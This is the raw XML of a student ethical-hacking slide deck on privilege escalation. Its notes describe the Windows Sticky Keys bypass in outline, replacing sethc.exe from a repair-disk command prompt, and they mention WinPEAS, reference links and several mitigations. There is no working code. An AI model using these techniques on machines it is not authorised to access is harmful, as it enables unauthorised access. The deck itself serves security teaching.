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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="273" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="294" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="278" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="284" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="292" r:id="rId25"/>
    <p:sldId id="293" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="272" r:id="rId28"/>
    <p:sldId id="262" r:id="rId29"/>
    <p:sldId id="263" r:id="rId30"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mon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3C68"/>
    <a:srgbClr val="09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78" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="159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ackernoon.com/-windows-sticky-keys-exploit-the-war-veteran-that-never-dies-its-very-likely-that-youve-heard-8ei2du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8c8c92569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8c8c92569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989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273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1944174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b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3368215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142734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628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ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1430059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https://www.hackingarticles.in/hack-remote-pc-with-operation-aurora-attack/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3835490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2801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178797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df67c48a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df67c48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5249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5132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556513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https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a:t>
            </a:r>
          </a:p>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381967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https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/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38798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https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/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36646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altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="882612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altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2916000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bece4b73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bece4b73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bece4b73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bece4b7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8df67c48a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df67c48a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c8c925694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c8c92569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654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237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5022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1047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c8c92569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c8c92569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https://hackingandcoffee.com/an-exercise-in-privilege-escalation-and-persistence/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can get to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prompt when running install CD or repair disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When in the command prompt you change the sticky key script to exploitation one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Go to system folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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Can it still be performed in Windows 10?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://hackernoon.com/-windows-sticky-keys-exploit-the-war-veteran-that-never-dies-its-very-likely-that-youve-heard-8ei2duh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>Does it still work? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>Kinda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> yes, because sticky key is not a vulnerability, it is a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But Microsoft did some patches </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Windows firewall preventing sethc.exe to run Cmd.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SFC restoring sethc.exe file back to it’s original.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Forbidding file modifications on the “System32” folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Removing "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>sethc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>" from the “System32” folder when accessing through the recovery mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Password protecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> access in the troubleshooting mode.</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To prevent, disable sticky keys keyboard activation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Disabling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> repair (not recommended)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>BIOS password</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302321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2834100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2834125"/>
            <a:ext cx="9144000" cy="25200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="767400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Google Shape;16;p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Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Google Shape;17;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="767400"/>
            <a:ext cx="9144000" cy="25200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="767400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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767400"/>
            <a:ext cx="9144000" cy="25200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="767400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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0" y="767400"/>
            <a:ext cx="9144000" cy="25200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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298450" y="11510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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="767400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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0" y="767400"/>
            <a:ext cx="9144000" cy="25200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="3576600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490250" y="450150"/>
            <a:ext cx="6367800" cy="30960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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26525" y="3576475"/>
            <a:ext cx="9144000" cy="25200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="0"/>
            <a:ext cx="4572000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="333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3354B"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Google Shape;40;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4572000" cy="2834100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="265500" y="238625"/>
            <a:ext cx="4115700" cy="247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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2834125"/>
            <a:ext cx="4572000" cy="25200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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5400000">
            <a:off x="2000700" y="2559600"/>
            <a:ext cx="5143500" cy="24300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EB3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3354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3250" y="95600"/>
            <a:ext cx="7417500" cy="576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09CECE"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mon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1pPr>
            <a:lvl2pPr marL="914400" lvl="1"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2pPr>
            <a:lvl3pPr marL="1371600" lvl="2"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3pPr>
            <a:lvl4pPr marL="1828800" lvl="3"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4pPr>
            <a:lvl5pPr marL="2286000" lvl="4"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5pPr>
            <a:lvl6pPr marL="2743200" lvl="5"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6pPr>
            <a:lvl7pPr marL="3200400" lvl="6"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7pPr>
            <a:lvl8pPr marL="3657600" lvl="7"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8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-317500">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;8;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7968174" y="4326475"/>
            <a:ext cx="1175825" cy="8170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carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASex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ook.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklis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log.g0tmi1k.com/2011/08/basic-linux-privilege-escalati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ttack.mitre.org/tactics/TA000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600"/>
              <a:t>Ethical Student Hackers</a:t>
            </a:r>
            <a:endParaRPr sz="4600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;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Privilege Escalation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Windows Sticky Keys</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC0F758-BB9C-4D12-98E9-E6C6408291A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="3407" t="5069" r="3207" b="61800"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418702" y="1100062"/>
            <a:ext cx="7862048" cy="1503126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77EBD0F1-BE62-4306-81C8-8D4BFEB4DFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="307778" y="1100062"/>
            <a:ext cx="5499165" cy="3849414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366168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t>WinPEAS</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75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>WinPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>a script that search for possible paths to escalate privileges on Windows hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
